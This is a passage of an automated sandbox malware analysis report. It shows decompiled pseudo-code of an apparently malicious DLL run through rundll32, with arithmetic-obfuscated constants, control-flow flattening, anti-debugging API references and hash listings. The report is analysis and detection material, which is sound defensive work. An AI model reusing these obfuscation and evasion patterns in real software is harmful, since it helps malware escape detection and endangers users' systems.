                                                                                                                      				_v36 = 0x9fb368;
                                                                                                                      				_v36 = _v36 >> 0xb;
                                                                                                                      				_v36 = _v36 ^ 0x000f389a;
                                                                                                                      				_v40 = 0x5cfe3a;
                                                                                                                      				_v40 = _v40 + 0x27ff;
                                                                                                                      				_v40 = _v40 ^ 0x005ee30c;
                                                                                                                      				_v104 = 0xfd26ea;
                                                                                                                      				_v104 = _v104 << 9;
                                                                                                                      				_v104 = _v104 + 0xffff1095;
                                                                                                                      				_v104 = _v104 + 0xffffd24c;
                                                                                                                      				_v104 = _v104 ^ 0xfa4b2973;
                                                                                                                      				_v80 = 0xbb493f;
                                                                                                                      				_v80 = _v80 + 0x4ae2;
                                                                                                                      				_v80 = _v80 | 0xbb4dbcb8;
                                                                                                                      				_v80 = _v80 + 0x3bc7;
                                                                                                                      				_v80 = _v80 ^ 0xbbf0b3fa;
                                                                                                                      				_v44 = 0xfc3c2e;
                                                                                                                      				_v44 = _v44 << 0x10;
                                                                                                                      				_v44 = _v44 + 0xffff4208;
                                                                                                                      				_v44 = _v44 ^ 0x3c281d99;
                                                                                                                      				_v84 = 0xc50344;
                                                                                                                      				_v84 = _v84 | 0xb9ed19f4;
                                                                                                                      				_v84 = _v84 / _t242;
                                                                                                                      				_t243 = 0x6b;
                                                                                                                      				_v84 = _v84 / _t243;
                                                                                                                      				_v84 = _v84 ^ 0x000f16db;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t231 = 0xc3f018b;
                                                                                                                      					do {
                                                                                                                      						L2:
                                                                                                                      						while(_t267 != 0x52ffaa2) {
                                                                                                                      							if(_t267 == 0x865547f) {
                                                                                                                      								_t243 = _v88;
                                                                                                                      								_t232 = E0068CDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                      								_t270 =  &(_t270[2]);
                                                                                                                      								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
                                                                                                                      								__eflags = _t232;
                                                                                                                      								_t231 = 0xc3f018b;
                                                                                                                      								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							if(_t267 == 0xb133873) {
                                                                                                                      								_push(_v32);
                                                                                                                      								_t233 = E0069C3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
                                                                                                                      								_t271 =  &(_t270[4]);
                                                                                                                      								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
                                                                                                                      								__eflags = _t233;
                                                                                                                      								if(_t233 != 0) {
                                                                                                                      									E00687B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
                                                                                                                      									_push( *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                      									_push(_v56);
                                                                                                                      									_push(_v52);
                                                                                                                      									_t243 = _v20;
                                                                                                                      									E00687C37(_v20, _v92);
                                                                                                                      									_t270 =  &(_t271[6]);
                                                                                                                      									_t267 = 0x865547f;
                                                                                                                      									goto L1;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t267 == 0xb7a2405) {
                                                                                                                      									return E00699E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                      								}
                                                                                                                      								if(_t267 != _t231) {
                                                                                                                      									goto L13;
                                                                                                                      								} else {
                                                                                                                      									_t233 = E006846BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E00684C5D, _v104);
                                                                                                                      									_t270 =  &(_t270[0xa]);
                                                                                                                      									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
                                                                                                                      									if(_t233 == 0) {
                                                                                                                      										_t267 = 0xb7a2405;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t231 = 0xc3f018b;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							return _t233;
                                                                                                                      						}
                                                                                                                      						_t267 = 0xb133873;
                                                                                                                      						L13:
                                                                                                                      						__eflags = _t267 - 0x1aeb2e;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					return _t231;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x0068bafd
                                                                                                                      0x0068bb00
                                                                                                                      0x0068bb04
                                                                                                                      0x0068bb0c
                                                                                                                      0x0068bb10
                                                                                                                      0x0068bb15
                                                                                                                      0x0068bb18
                                                                                                                      0x00000000
                                                                                                                      0x0068bb18
                                                                                                                      0x0068ba78
                                                                                                                      0x0068ba7a
                                                                                                                      0x00000000
                                                                                                                      0x0068bb75
                                                                                                                      0x0068ba82
                                                                                                                      0x00000000
                                                                                                                      0x0068ba88
                                                                                                                      0x0068baa9
                                                                                                                      0x0068baae
                                                                                                                      0x0068bab1
                                                                                                                      0x0068bab6
                                                                                                                      0x0068babc
                                                                                                                      0x0068ba53
                                                                                                                      0x0068ba53
                                                                                                                      0x0068ba53
                                                                                                                      0x00000000
                                                                                                                      0x0068ba53
                                                                                                                      0x0068ba53
                                                                                                                      0x0068bab6
                                                                                                                      0x0068ba82
                                                                                                                      0x0068bb7d
                                                                                                                      0x0068bb7d
                                                                                                                      0x0068bb4d
                                                                                                                      0x0068bb52
                                                                                                                      0x0068bb52
                                                                                                                      0x0068bb52
                                                                                                                      0x00000000
                                                                                                                      0x0068ba58

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !)$2+l$>e`$?p$J$e'
                                                                                                                      • API String ID: 0-1675410552
                                                                                                                      • Opcode ID: 69228edd1fab55b14a1a47fee3f30ed958737d76b4b8c7d78f58f87a8f5d4094
                                                                                                                      • Instruction ID: 3565794bbfef45539e8dfb36a3db067db17a6ca0b5c7675f6498c558e4148001
                                                                                                                      • Opcode Fuzzy Hash: 69228edd1fab55b14a1a47fee3f30ed958737d76b4b8c7d78f58f87a8f5d4094
                                                                                                                      • Instruction Fuzzy Hash: CBB12E724083809FC358DF65C58A40BFBE2FBC5758F108A1CF59A96260D7B5CA59CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2579439406-0
                                                                                                                      • Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                      • Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
                                                                                                                      • Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                      • Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E006A0056() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				unsigned int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				void* _t500;
                                                                                                                      				void* _t502;
                                                                                                                      				intOrPtr* _t509;
                                                                                                                      				void* _t513;
                                                                                                                      				signed int _t522;
                                                                                                                      				intOrPtr _t523;
                                                                                                                      				intOrPtr* _t524;
                                                                                                                      				signed int _t525;
                                                                                                                      				signed int _t526;
                                                                                                                      				signed int _t527;
                                                                                                                      				signed int _t528;
                                                                                                                      				signed int _t529;
                                                                                                                      				signed int _t530;
                                                                                                                      				signed int _t531;
                                                                                                                      				signed int _t532;
                                                                                                                      				signed int _t533;
                                                                                                                      				signed int _t534;
                                                                                                                      				signed int _t535;
                                                                                                                      				signed int _t536;
                                                                                                                      				signed int _t537;
                                                                                                                      				signed int _t538;
                                                                                                                      				signed int _t539;
                                                                                                                      				void* _t540;
                                                                                                                      				void* _t546;
                                                                                                                      				intOrPtr _t556;
                                                                                                                      				void* _t603;
                                                                                                                      				signed int _t605;
                                                                                                                      				signed int* _t609;
                                                                                                                      
                                                                                                                      				_t609 =  &_v1748;
                                                                                                                      				_v1648 = 0xded5e0;
                                                                                                                      				_v1648 = _v1648 >> 0xb;
                                                                                                                      				_v1648 = _v1648 | 0x3a1a97de;
                                                                                                                      				_v1648 = _v1648 ^ 0x3a1a9ff7;
                                                                                                                      				_v1608 = 0x6694ca;
                                                                                                                      				_v1608 = _v1608 | 0xdc2b4f48;
                                                                                                                      				_v1608 = _v1608 ^ 0x5c6fdfcb;
                                                                                                                      				_v1712 = 0x53f825;
                                                                                                                      				_v1712 = _v1712 >> 2;
                                                                                                                      				_v1712 = _v1712 ^ 0x4e440c95;
                                                                                                                      				_v1712 = _v1712 | 0x7235b0e7;
                                                                                                                      				_v1712 = _v1712 ^ 0x7e75f2fd;
                                                                                                                      				_v1632 = 0xc6d169;
                                                                                                                      				_v1568 = 0;
                                                                                                                      				_t603 = 0x9805d0a;
                                                                                                                      				_t525 = 0x52;
                                                                                                                      				_v1632 = _v1632 / _t525;
                                                                                                                      				_t526 = 0x67;
                                                                                                                      				_v1632 = _v1632 * 0x1e;
                                                                                                                      				_v1632 = _v1632 ^ 0x0048bcfb;
                                                                                                                      				_v1596 = 0x189afb;
                                                                                                                      				_v1596 = _v1596 >> 0xe;
                                                                                                                      				_v1596 = _v1596 ^ 0x000d7c1d;
                                                                                                                      				_v1724 = 0x4bfed1;
                                                                                                                      				_v1724 = _v1724 * 0x63;
                                                                                                                      				_v1724 = _v1724 * 0x55;
                                                                                                                      				_v1724 = _v1724 >> 1;
                                                                                                                      				_v1724 = _v1724 ^ 0x61069d5d;
                                                                                                                      				_v1580 = 0x401b2b;
                                                                                                                      				_v1580 = _v1580 + 0x7090;
                                                                                                                      				_v1580 = _v1580 ^ 0x00412b45;
                                                                                                                      				_v1672 = 0xbaa782;
                                                                                                                      				_v1672 = _v1672 / _t526;
                                                                                                                      				_v1672 = _v1672 << 2;
                                                                                                                      				_v1672 = _v1672 ^ 0x000e5528;
                                                                                                                      				_v1624 = 0x1efbce;
                                                                                                                      				_t527 = 0x4f;
                                                                                                                      				_v1624 = _v1624 / _t527;
                                                                                                                      				_v1624 = _v1624 ^ 0x000dc160;
                                                                                                                      				_v1572 = 0x9ef416;
                                                                                                                      				_t605 = 0x62;
                                                                                                                      				_v1572 = _v1572 / _t605;
                                                                                                                      				_v1572 = _v1572 ^ 0x00079814;
                                                                                                                      				_v1612 = 0x4efe15;
                                                                                                                      				_t528 = 0x43;
                                                                                                                      				_v1612 = _v1612 / _t528;
                                                                                                                      				_v1612 = _v1612 ^ 0x000e5446;
                                                                                                                      				_v1640 = 0x94326d;
                                                                                                                      				_t529 = 0x77;
                                                                                                                      				_v1640 = _v1640 / _t529;
                                                                                                                      				_t530 = 0x35;
                                                                                                                      				_v1640 = _v1640 / _t530;
                                                                                                                      				_v1640 = _v1640 ^ 0x000d83b8;
                                                                                                                      				_v1676 = 0x511d41;
                                                                                                                      				_t531 = 9;
                                                                                                                      				_v1676 = _v1676 * 0x76;
                                                                                                                      				_v1676 = _v1676 ^ 0xeef8e480;
                                                                                                                      				_v1676 = _v1676 ^ 0xcb952f57;
                                                                                                                      				_v1708 = 0x4e0a18;
                                                                                                                      				_v1708 = _v1708 ^ 0x2110c6ad;
                                                                                                                      				_v1708 = _v1708 | 0x4a7f48ac;
                                                                                                                      				_v1708 = _v1708 + 0xffff2cb4;
                                                                                                                      				_v1708 = _v1708 ^ 0x6b758b76;
                                                                                                                      				_v1732 = 0x7a6741;
                                                                                                                      				_t123 =  &_v1732; // 0x7a6741
                                                                                                                      				_v1732 =  *_t123 / _t531;
                                                                                                                      				_v1732 = _v1732 << 0xe;
                                                                                                                      				_v1732 = _v1732 << 7;
                                                                                                                      				_v1732 = _v1732 ^ 0x36245548;
                                                                                                                      				_v1700 = 0x42788;
                                                                                                                      				_t532 = 0x44;
                                                                                                                      				_v1700 = _v1700 / _t532;
                                                                                                                      				_v1700 = _v1700 | 0xce808109;
                                                                                                                      				_v1700 = _v1700 + 0xffff7a0f;
                                                                                                                      				_v1700 = _v1700 ^ 0xce88d2ed;
                                                                                                                      				_v1740 = 0x39c25c;
                                                                                                                      				_v1740 = _v1740 + 0xf71;
                                                                                                                      				_t533 = 0x75;
                                                                                                                      				_v1740 = _v1740 / _t533;
                                                                                                                      				_v1740 = _v1740 ^ 0xc60840fd;
                                                                                                                      				_v1740 = _v1740 ^ 0xc60d36f5;
                                                                                                                      				_v1716 = 0x2bcc6c;
                                                                                                                      				_v1716 = _v1716 + 0x97be;
                                                                                                                      				_v1716 = _v1716 >> 0xd;
                                                                                                                      				_v1716 = _v1716 ^ 0xcb020dbc;
                                                                                                                      				_v1716 = _v1716 ^ 0xcb05808e;
                                                                                                                      				_v1604 = 0x3f7ac0;
                                                                                                                      				_v1604 = _v1604 + 0xafc6;
                                                                                                                      				_v1604 = _v1604 ^ 0x0048c4ef;
                                                                                                                      				_v1576 = 0x9f011d;
                                                                                                                      				_v1576 = _v1576 ^ 0x8bb25c52;
                                                                                                                      				_v1576 = _v1576 ^ 0x8b2a60ae;
                                                                                                                      				_v1684 = 0xe4045e;
                                                                                                                      				_v1684 = _v1684 * 0x42;
                                                                                                                      				_v1684 = _v1684 * 0xc;
                                                                                                                      				_v1684 = _v1684 ^ 0xc16ccb70;
                                                                                                                      				_v1720 = 0x76be5;
                                                                                                                      				_v1720 = _v1720 >> 0xd;
                                                                                                                      				_v1720 = _v1720 * 0x3b;
                                                                                                                      				_v1720 = _v1720 + 0xffffaa4e;
                                                                                                                      				_v1720 = _v1720 ^ 0xfff1ea6d;
                                                                                                                      				_v1680 = 0x1fb4c3;
                                                                                                                      				_v1680 = _v1680 << 4;
                                                                                                                      				_v1680 = _v1680 << 0xc;
                                                                                                                      				_v1680 = _v1680 ^ 0xb4c6c556;
                                                                                                                      				_v1644 = 0xb0dbcd;
                                                                                                                      				_v1644 = _v1644 << 0xf;
                                                                                                                      				_v1644 = _v1644 << 0x10;
                                                                                                                      				_v1644 = _v1644 ^ 0x800a09c5;
                                                                                                                      				_v1600 = 0x1a67e8;
                                                                                                                      				_v1600 = _v1600 | 0xeb4b5744;
                                                                                                                      				_v1600 = _v1600 ^ 0xeb54c7c0;
                                                                                                                      				_v1652 = 0x1784b1;
                                                                                                                      				_v1652 = _v1652 >> 0xf;
                                                                                                                      				_v1652 = _v1652 << 6;
                                                                                                                      				_v1652 = _v1652 ^ 0x00082079;
                                                                                                                      				_v1660 = 0xec7770;
                                                                                                                      				_v1660 = _v1660 + 0xb190;
                                                                                                                      				_v1660 = _v1660 | 0x400c0cca;
                                                                                                                      				_v1660 = _v1660 ^ 0x40ee2104;
                                                                                                                      				_v1668 = 0xfc9259;
                                                                                                                      				_v1668 = _v1668 + 0xffffc6b7;
                                                                                                                      				_v1668 = _v1668 >> 0xe;
                                                                                                                      				_v1668 = _v1668 ^ 0x000f272a;
                                                                                                                      				_v1704 = 0xff7fae;
                                                                                                                      				_v1704 = _v1704 + 0xffff711f;
                                                                                                                      				_v1704 = _v1704 + 0xffff4b94;
                                                                                                                      				_v1704 = _v1704 | 0x5a3393fe;
                                                                                                                      				_v1704 = _v1704 ^ 0x5af53198;
                                                                                                                      				_v1616 = 0x130067;
                                                                                                                      				_t534 = 0x4e;
                                                                                                                      				_v1616 = _v1616 / _t534;
                                                                                                                      				_v1616 = _v1616 ^ 0x00057283;
                                                                                                                      				_v1628 = 0x10552;
                                                                                                                      				_v1628 = _v1628 + 0xf3cd;
                                                                                                                      				_v1628 = _v1628 + 0x9e6e;
                                                                                                                      				_v1628 = _v1628 ^ 0x00033ec8;
                                                                                                                      				_v1636 = 0x95cc92;
                                                                                                                      				_v1636 = _v1636 >> 0xf;
                                                                                                                      				_v1636 = _v1636 + 0x9761;
                                                                                                                      				_v1636 = _v1636 ^ 0x000e6713;
                                                                                                                      				_v1748 = 0xd7b406;
                                                                                                                      				_t535 = 0x31;
                                                                                                                      				_v1748 = _v1748 * 0x46;
                                                                                                                      				_v1748 = _v1748 << 1;
                                                                                                                      				_v1748 = _v1748 + 0x479a;
                                                                                                                      				_v1748 = _v1748 ^ 0x75ff50ef;
                                                                                                                      				_v1584 = 0xe29275;
                                                                                                                      				_v1584 = _v1584 * 0x6d;
                                                                                                                      				_v1584 = _v1584 ^ 0x607f0d3c;
                                                                                                                      				_v1664 = 0xc2b99a;
                                                                                                                      				_v1664 = _v1664 / _t605;
                                                                                                                      				_v1664 = _v1664 | 0xc7d1021c;
                                                                                                                      				_v1664 = _v1664 ^ 0xc7dc1815;
                                                                                                                      				_v1692 = 0xa5d2da;
                                                                                                                      				_v1692 = _v1692 * 0x17;
                                                                                                                      				_v1692 = _v1692 / _t535;
                                                                                                                      				_t536 = 0x23;
                                                                                                                      				_v1692 = _v1692 * 0x3a;
                                                                                                                      				_v1692 = _v1692 ^ 0x11a891cb;
                                                                                                                      				_v1656 = 0x680db3;
                                                                                                                      				_v1656 = _v1656 >> 6;
                                                                                                                      				_v1656 = _v1656 >> 5;
                                                                                                                      				_v1656 = _v1656 ^ 0x000507e8;
                                                                                                                      				_v1728 = 0x12970f;
                                                                                                                      				_v1728 = _v1728 + 0xffffbe66;
                                                                                                                      				_v1728 = _v1728 >> 6;
                                                                                                                      				_v1728 = _v1728 / _t536;
                                                                                                                      				_v1728 = _v1728 ^ 0x00053169;
                                                                                                                      				_v1620 = 0xa87d1b;
                                                                                                                      				_v1620 = _v1620 + 0xc3ba;
                                                                                                                      				_v1620 = _v1620 ^ 0x00a7b1ac;
                                                                                                                      				_v1736 = 0xb206b7;
                                                                                                                      				_v1736 = _v1736 ^ 0x6f4eb888;
                                                                                                                      				_t537 = 0x5d;
                                                                                                                      				_v1736 = _v1736 / _t537;
                                                                                                                      				_v1736 = _v1736 + 0x173b;
                                                                                                                      				_v1736 = _v1736 ^ 0x013191a0;
                                                                                                                      				_v1744 = 0xbf67a7;
                                                                                                                      				_t538 = 0x70;
                                                                                                                      				_v1744 = _v1744 / _t538;
                                                                                                                      				_v1744 = _v1744 | 0x1279871b;
                                                                                                                      				_v1744 = _v1744 ^ 0x04c3b9b8;
                                                                                                                      				_v1744 = _v1744 ^ 0x16b0fef0;
                                                                                                                      				_v1588 = 0x7bc48a;
                                                                                                                      				_v1588 = _v1588 << 7;
                                                                                                                      				_v1588 = _v1588 ^ 0x3de90636;
                                                                                                                      				_v1688 = 0x5dc5eb;
                                                                                                                      				_v1688 = _v1688 >> 0xb;
                                                                                                                      				_v1688 = _v1688 + 0xaf87;
                                                                                                                      				_t539 = 0x6c;
                                                                                                                      				_t522 = _v1568;
                                                                                                                      				_v1688 = _v1688 * 0x63;
                                                                                                                      				_v1688 = _v1688 ^ 0x004fac27;
                                                                                                                      				_v1696 = 0x311285;
                                                                                                                      				_v1696 = _v1696 << 0xb;
                                                                                                                      				_v1696 = _v1696 ^ 0x3061b352;
                                                                                                                      				_v1696 = _v1696 / _t539;
                                                                                                                      				_v1696 = _v1696 ^ 0x01b73771;
                                                                                                                      				_v1592 = 0x977507;
                                                                                                                      				_v1592 = _v1592 | 0xf9843f0d;
                                                                                                                      				_v1592 = _v1592 ^ 0xf99a58c3;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t540 = 0x5c;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t500 = 0x8167d85;
                                                                                                                      						do {
                                                                                                                      							L3:
                                                                                                                      							if(_t603 == 0x2c7b186) {
                                                                                                                      								E00681FD1(_v1688, _v1696, _v1592, _v1564);
                                                                                                                      								_t603 = 0xcf98960;
                                                                                                                      								goto L18;
                                                                                                                      							} else {
                                                                                                                      								if(_t603 == 0x33b45b1) {
                                                                                                                      									_push(_v1680);
                                                                                                                      									_push(_v1720);
                                                                                                                      									_t502 = E0069DCF7(_v1684, 0x681080, __eflags);
                                                                                                                      									_pop(_t546);
                                                                                                                      									__eflags = E0068AAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
                                                                                                                      									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
                                                                                                                      									E0068A8B0(_v1628, _t502, _v1636);
                                                                                                                      									_t609 =  &(_t609[0xf]);
                                                                                                                      									L18:
                                                                                                                      									_t500 = 0x8167d85;
                                                                                                                      									_t540 = 0x5c;
                                                                                                                      								} else {
                                                                                                                      									if(_t603 == _t500) {
                                                                                                                      										_t509 = E0068F002(2 + E0068CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E0068CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
                                                                                                                      										_t609 =  &(_t609[0xd]);
                                                                                                                      										__eflags = _t509;
                                                                                                                      										_t603 = 0x2c7b186;
                                                                                                                      										_v1568 = 0 | __eflags == 0x00000000;
                                                                                                                      										goto L1;
                                                                                                                      									} else {
                                                                                                                      										if(_t603 == 0x9805d0a) {
                                                                                                                      											_push(_v1672);
                                                                                                                      											_push(_v1648);
                                                                                                                      											_push(_v1580);
                                                                                                                      											_push( &_v520);
                                                                                                                      											E006946BB(_v1596, _v1724);
                                                                                                                      											_t609 = _t609 - 0xc + 0x1c;
                                                                                                                      											_t603 = 0xc81d40c;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t540 = 0x5c;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											if(_t603 == 0xaea35f7) {
                                                                                                                      												_t523 =  *0x6a3e10; // 0x0
                                                                                                                      												_t524 = _t523 + 0x1c;
                                                                                                                      												while(1) {
                                                                                                                      													__eflags =  *_t524 - _t540;
                                                                                                                      													if(__eflags == 0) {
                                                                                                                      														break;
                                                                                                                      													}
                                                                                                                      													_t524 = _t524 + 2;
                                                                                                                      													__eflags = _t524;
                                                                                                                      												}
                                                                                                                      												_t522 = _t524 + 2;
                                                                                                                      												_t603 = 0x33b45b1;
                                                                                                                      												goto L2;
                                                                                                                      											} else {
                                                                                                                      												_t618 = _t603 - 0xc81d40c;
                                                                                                                      												if(_t603 == 0xc81d40c) {
                                                                                                                      													_push(_v1612);
                                                                                                                      													_push(_v1572);
                                                                                                                      													_t513 = E0069DCF7(_v1624, 0x681020, _t618);
                                                                                                                      													E0069176B( &_v1040, _t618);
                                                                                                                      													_t556 =  *0x6a3e10; // 0x0
                                                                                                                      													_t403 = _t556 + 0x1c; // 0x1c
                                                                                                                      													_t404 = _t556 + 0x23c; // 0x23c
                                                                                                                      													E00691652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
                                                                                                                      													E0068A8B0(_v1604, _t513, _v1576);
                                                                                                                      													_t609 =  &(_t609[0xf]);
                                                                                                                      													_t603 = 0xaea35f7;
                                                                                                                      													while(1) {
                                                                                                                      														L1:
                                                                                                                      														_t540 = 0x5c;
                                                                                                                      														L2:
                                                                                                                      														_t500 = 0x8167d85;
                                                                                                                      														goto L3;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							__eflags = _t603 - 0xcf98960;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						return _v1568;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

















































































                                                                                                                      0x006a095c
                                                                                                                      0x006a0967
                                                                                                                      0x006a096a
                                                                                                                      0x006a096f
                                                                                                                      0x006a0993
                                                                                                                      0x006a0995
                                                                                                                      0x006a099a
                                                                                                                      0x006a0740
                                                                                                                      0x006a0742
                                                                                                                      0x006a08ca
                                                                                                                      0x006a08d1
                                                                                                                      0x006a08d4
                                                                                                                      0x006a08d6
                                                                                                                      0x006a08de
                                                                                                                      0x00000000
                                                                                                                      0x006a0748
                                                                                                                      0x006a074e
                                                                                                                      0x006a0831
                                                                                                                      0x006a083c
                                                                                                                      0x006a0840
                                                                                                                      0x006a0855
                                                                                                                      0x006a0856
                                                                                                                      0x006a085b
                                                                                                                      0x006a085e
                                                                                                                      0x006a0720
                                                                                                                      0x006a0720
                                                                                                                      0x006a0722
                                                                                                                      0x00000000
                                                                                                                      0x006a0722
                                                                                                                      0x006a0754
                                                                                                                      0x006a075a
                                                                                                                      0x006a0811
                                                                                                                      0x006a0817
                                                                                                                      0x006a081f
                                                                                                                      0x006a081f
                                                                                                                      0x006a0822
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006a081c
                                                                                                                      0x006a081c
                                                                                                                      0x006a081c
                                                                                                                      0x006a0824
                                                                                                                      0x006a0827
                                                                                                                      0x00000000
                                                                                                                      0x006a0760
                                                                                                                      0x006a0760
                                                                                                                      0x006a0766
                                                                                                                      0x006a076c
                                                                                                                      0x006a0778
                                                                                                                      0x006a0786
                                                                                                                      0x006a0794
                                                                                                                      0x006a07cb
                                                                                                                      0x006a07d8
                                                                                                                      0x006a07dc
                                                                                                                      0x006a07ea
                                                                                                                      0x006a07ff
                                                                                                                      0x006a0804
                                                                                                                      0x006a0807
                                                                                                                      0x006a0720
                                                                                                                      0x006a0720
                                                                                                                      0x006a0722
                                                                                                                      0x006a0723
                                                                                                                      0x006a0723
                                                                                                                      0x00000000
                                                                                                                      0x006a0723
                                                                                                                      0x006a0720
                                                                                                                      0x006a0766
                                                                                                                      0x006a075a
                                                                                                                      0x006a074e
                                                                                                                      0x006a0742
                                                                                                                      0x006a073a
                                                                                                                      0x006a099b
                                                                                                                      0x006a099b
                                                                                                                      0x006a09b4
                                                                                                                      0x006a09b4
                                                                                                                      0x006a0723

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
